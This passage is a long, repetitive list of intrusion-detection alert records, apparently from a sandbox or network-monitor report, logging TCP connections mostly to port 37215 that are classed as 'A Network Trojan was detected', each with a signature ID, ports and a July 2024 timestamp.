                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.133887
                  SID:2829579
                  Source Port:55170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.777309
                  SID:2835222
                  Source Port:54786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.156560
                  SID:2829579
                  Source Port:43244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.144778
                  SID:2829579
                  Source Port:40576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.436207
                  SID:2829579
                  Source Port:36644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.811606
                  SID:2829579
                  Source Port:52708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.976669
                  SID:2829579
                  Source Port:51058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.121135
                  SID:2835222
                  Source Port:37040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.549602
                  SID:2829579
                  Source Port:39532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872707
                  SID:2829579
                  Source Port:53620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881415
                  SID:2829579
                  Source Port:50166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.857526
                  SID:2829579
                  Source Port:60790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.646410
                  SID:2835222
                  Source Port:37924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.450781
                  SID:2829579
                  Source Port:39642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.034079
                  SID:2835222
                  Source Port:49636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320743
                  SID:2829579
                  Source Port:53630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.546490
                  SID:2829579
                  Source Port:60566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.268531
                  SID:2829579
                  Source Port:57890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.252129
                  SID:2835222
                  Source Port:47494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.868088
                  SID:2835222
                  Source Port:49620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.300019
                  SID:2829579
                  Source Port:47730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.923272
                  SID:2829579
                  Source Port:53758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.401020
                  SID:2835222
                  Source Port:35156
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.003355
                  SID:2835222
                  Source Port:53684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.246570
                  SID:2835222
                  Source Port:34918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.028986
                  SID:2835222
                  Source Port:47120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.813541
                  SID:2835222
                  Source Port:58348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.383866
                  SID:2835222
                  Source Port:38710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.514524
                  SID:2829579
                  Source Port:57978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.433445
                  SID:2835222
                  Source Port:49368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.908603
                  SID:2829579
                  Source Port:45158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.986778
                  SID:2829579
                  Source Port:53202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117874
                  SID:2835222
                  Source Port:55572
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.924774
                  SID:2829579
                  Source Port:40648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850928
                  SID:2829579
                  Source Port:41798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.956633
                  SID:2835222
                  Source Port:35008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.450144
                  SID:2829579
                  Source Port:56808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.108573
                  SID:2835222
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.164992
                  SID:2835222
                  Source Port:46298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.553741
                  SID:2835222
                  Source Port:51106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.939725
                  SID:2835222
                  Source Port:54370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.363938
                  SID:2835222
                  Source Port:35788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.726260
                  SID:2829579
                  Source Port:41674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.715321
                  SID:2835222
                  Source Port:41522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651870
                  SID:2835222
                  Source Port:34344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810948
                  SID:2835222
                  Source Port:42038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.018335
                  SID:2835222
                  Source Port:57014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.787067
                  SID:2829579
                  Source Port:33768
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.861030
                  SID:2829579
                  Source Port:46438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.176697
                  SID:2835222
                  Source Port:39154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538484
                  SID:2835222
                  Source Port:36190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.428456
                  SID:2030490
                  Source Port:50578
                  Destination Port:5976
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681419
                  SID:2829579
                  Source Port:50544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993407
                  SID:2829579
                  Source Port:59660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086476
                  SID:2835222
                  Source Port:44060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.587854
                  SID:2829579
                  Source Port:41890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.809234
                  SID:2835222
                  Source Port:42950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.500139
                  SID:2835222
                  Source Port:41414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.822021
                  SID:2835222
                  Source Port:53984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.722420
                  SID:2829579
                  Source Port:42742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.220659
                  SID:2829579
                  Source Port:39650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.590695
                  SID:2829579
                  Source Port:43852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.772225
                  SID:2829579
                  Source Port:50452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847797
                  SID:2829579
                  Source Port:47344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.171113
                  SID:2829579
                  Source Port:55412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.094763
                  SID:2835222
                  Source Port:53140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.147749
                  SID:2835222
                  Source Port:59704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348591
                  SID:2829579
                  Source Port:35540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376255
                  SID:2829579
                  Source Port:56996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.202562
                  SID:2829579
                  Source Port:56574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.451550
                  SID:2829579
                  Source Port:55202
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.606068
                  SID:2829579
                  Source Port:46792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2835222
                  Source Port:56872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188180
                  SID:2835222
                  Source Port:37496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655125
                  SID:2835222
                  Source Port:50020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.527873
                  SID:2835222
                  Source Port:48324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.353387
                  SID:2835222
                  Source Port:52238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.028611
                  SID:2835222
                  Source Port:41428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.360121
                  SID:2829579
                  Source Port:51226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.680054
                  SID:2835222
                  Source Port:55092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522972
                  SID:2829579
                  Source Port:47102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.770839
                  SID:2829579
                  Source Port:39344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.228300
                  SID:2835222
                  Source Port:54318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.889339
                  SID:2829579
                  Source Port:48340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633014
                  SID:2829579
                  Source Port:50108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.360121
                  SID:2829579
                  Source Port:41658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.527013
                  SID:2835222
                  Source Port:53360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.862864
                  SID:2829579
                  Source Port:41834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.056183
                  SID:2835222
                  Source Port:39632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.432094
                  SID:2829579
                  Source Port:50078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.834520
                  SID:2835222
                  Source Port:37400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.665893
                  SID:2835222
                  Source Port:51824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.287711
                  SID:2829579
                  Source Port:43986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.805311
                  SID:2829579
                  Source Port:52218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.414477
                  SID:2829579
                  Source Port:35402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.817935
                  SID:2835222
                  Source Port:51130
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.474146
                  SID:2835222
                  Source Port:47092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.207305
                  SID:2829579
                  Source Port:42476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2829579
                  Source Port:39310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816955
                  SID:2829579
                  Source Port:48058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.254961
                  SID:2829579
                  Source Port:48260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.872806
                  SID:2829579
                  Source Port:49706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.176056
                  SID:2835222
                  Source Port:55308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.044198
                  SID:2829579
                  Source Port:47070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.126836
                  SID:2829579
                  Source Port:38708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.978087
                  SID:2829579
                  Source Port:50804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927814
                  SID:2835222
                  Source Port:41770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.900161
                  SID:2835222
                  Source Port:37150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.872861
                  SID:2835222
                  Source Port:50564
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.210385
                  SID:2835222
                  Source Port:39932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.537875
                  SID:2835222
                  Source Port:44502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383714
                  SID:2835222
                  Source Port:44944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.457605
                  SID:2829579
                  Source Port:49194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.352780
                  SID:2829579
                  Source Port:41036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.833897
                  SID:2835222
                  Source Port:39110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.037951
                  SID:2835222
                  Source Port:44806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2835222
                  Source Port:39946
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454213
                  SID:2829579
                  Source Port:53958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.593723
                  SID:2835222
                  Source Port:35720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.930240
                  SID:2829579
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.468453
                  SID:2835222
                  Source Port:37132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.970065
                  SID:2835222
                  Source Port:52724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.192281
                  SID:2835222
                  Source Port:44452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.200301
                  SID:2829579
                  Source Port:51166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.806534
                  SID:2835222
                  Source Port:43638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.680100
                  SID:2829579
                  Source Port:41924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.702243
                  SID:2835222
                  Source Port:50152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.542620
                  SID:2835222
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.077198
                  SID:2829579
                  Source Port:41974
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.778513
                  SID:2835222
                  Source Port:55848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.010127
                  SID:2829579
                  Source Port:43878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873884
                  SID:2835222
                  Source Port:37008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.750932
                  SID:2829579
                  Source Port:46264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.023692
                  SID:2835222
                  Source Port:33716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.304428
                  SID:2835222
                  Source Port:48048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392562
                  SID:2829579
                  Source Port:37460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.966434
                  SID:2835222
                  Source Port:38270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.915433
                  SID:2835222
                  Source Port:53560
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.110888
                  SID:2835222
                  Source Port:53490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.166919
                  SID:2835222
                  Source Port:54634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.611933
                  SID:2835222
                  Source Port:54534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.772375
                  SID:2835222
                  Source Port:39050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.183913
                  SID:2829579
                  Source Port:58346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.081335
                  SID:2829579
                  Source Port:56232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.531536
                  SID:2829579
                  Source Port:45770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933936
                  SID:2829579
                  Source Port:41672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.763197
                  SID:2835222
                  Source Port:48954
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962389
                  SID:2835222
                  Source Port:55898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.703676
                  SID:2835222
                  Source Port:49344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.628167
                  SID:2835222
                  Source Port:59250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253799
                  SID:2835222
                  Source Port:56480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.479319
                  SID:2829579
                  Source Port:50836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.095355
                  SID:2835222
                  Source Port:39024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.942445
                  SID:2835222
                  Source Port:45632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.024313
                  SID:2829579
                  Source Port:48850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.522844
                  SID:2829579
                  Source Port:58988
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.344917
                  SID:2835222
                  Source Port:34382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.917695
                  SID:2835222
                  Source Port:50152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.801295
                  SID:2829579
                  Source Port:50934
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.332526
                  SID:2835222
                  Source Port:50120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.603299
                  SID:2829579
                  Source Port:38226
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.645814
                  SID:2835222
                  Source Port:52120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844556
                  SID:2835222
                  Source Port:35874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.616284
                  SID:2829579
                  Source Port:34400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.091003
                  SID:2835222
                  Source Port:51956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.425783
                  SID:2829579
                  Source Port:40004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.165793
                  SID:2835222
                  Source Port:59300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.851044
                  SID:2835222
                  Source Port:55172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.455167
                  SID:2829579
                  Source Port:34374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.831803
                  SID:2835222
                  Source Port:52436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.372115
                  SID:2835222
                  Source Port:60770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.998303
                  SID:2829579
                  Source Port:55158
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.502478
                  SID:2829579
                  Source Port:54658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.476492
                  SID:2835222
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.188870
                  SID:2829579
                  Source Port:47346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.657674
                  SID:2835222
                  Source Port:59508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.600152
                  SID:2829579
                  Source Port:42368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.237308
                  SID:2829579
                  Source Port:43886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2835222
                  Source Port:53664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.843143
                  SID:2835222
                  Source Port:51868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505876
                  SID:2835222
                  Source Port:55762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.417902
                  SID:2829579
                  Source Port:38146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.446211
                  SID:2835222
